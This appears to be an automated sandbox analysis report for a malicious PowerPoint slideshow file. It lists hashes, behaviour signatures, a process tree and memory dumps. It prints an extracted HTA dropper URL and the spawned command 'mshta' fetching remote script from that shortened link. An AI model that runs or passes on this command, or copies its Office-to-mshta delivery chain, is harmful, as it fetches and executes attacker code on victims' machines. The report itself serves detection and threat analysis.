Analysis

  • max time kernel
    76s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 07:41

General

  • Target

    71ba20bdd899fde2a4e2967bc6c719f2c96146cc80c3dd8953431cb82d4df199.pps

  • Size

    81KB

  • MD5

    059e79d36927bb230e90376aa7528015

  • SHA1

    2448b57e97a917d01993c89b901ad2c21d413792

  • SHA256

    71ba20bdd899fde2a4e2967bc6c719f2c96146cc80c3dd8953431cb82d4df199

  • SHA512

    667451539ea0809ba9de6ea23d703d8641bf3d3df417fc0c48a13584b5cc6d3f1fc97468af98c3f8dbc73d4ed79e3f52aaee372a4a2f0d77019ba9328ec345fc

  • SSDEEP

    768:EvV9mdLakIT0fSCmwypPtV2RLcicHw6no37p8hcjo:ENemwypPGkHV

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://www.bitly.com/eyuiqwhdbkmasbdma

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 17 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\71ba20bdd899fde2a4e2967bc6c719f2c96146cc80c3dd8953431cb82d4df199.pps" /ou ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3808
    • C:\Windows\SYSTEM32\mshta.exe
      mshta https://www.bitly.com/eyuiqwhdbkmasbdma
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      PID:456
    • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
      "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3560
      2⤵
      • Process spawned suspicious child process
      • Suspicious use of WriteProcessMemory
      PID:4372
      • C:\Windows\system32\dwwin.exe
        C:\Windows\system32\dwwin.exe -x -s 3560
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        PID:4924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3808-1-0x00007FFC191CD000-0x00007FFC191CE000-memory.dmp

    Filesize

    4KB

  • memory/3808-0-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/3808-3-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/3808-4-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/3808-5-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/3808-6-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-7-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-2-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/3808-10-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-9-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-8-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-11-0x00007FFBD6F70000-0x00007FFBD6F80000-memory.dmp

    Filesize

    64KB

  • memory/3808-12-0x00007FFBD6F70000-0x00007FFBD6F80000-memory.dmp

    Filesize

    64KB

  • memory/3808-15-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-14-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-13-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-17-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-16-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-39-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-46-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-45-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/3808-59-0x00007FFC19130000-0x00007FFC19325000-memory.dmp

    Filesize

    2.0MB

  • memory/4372-63-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/4372-62-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/4372-61-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB

  • memory/4372-60-0x00007FFBD91B0000-0x00007FFBD91C0000-memory.dmp

    Filesize

    64KB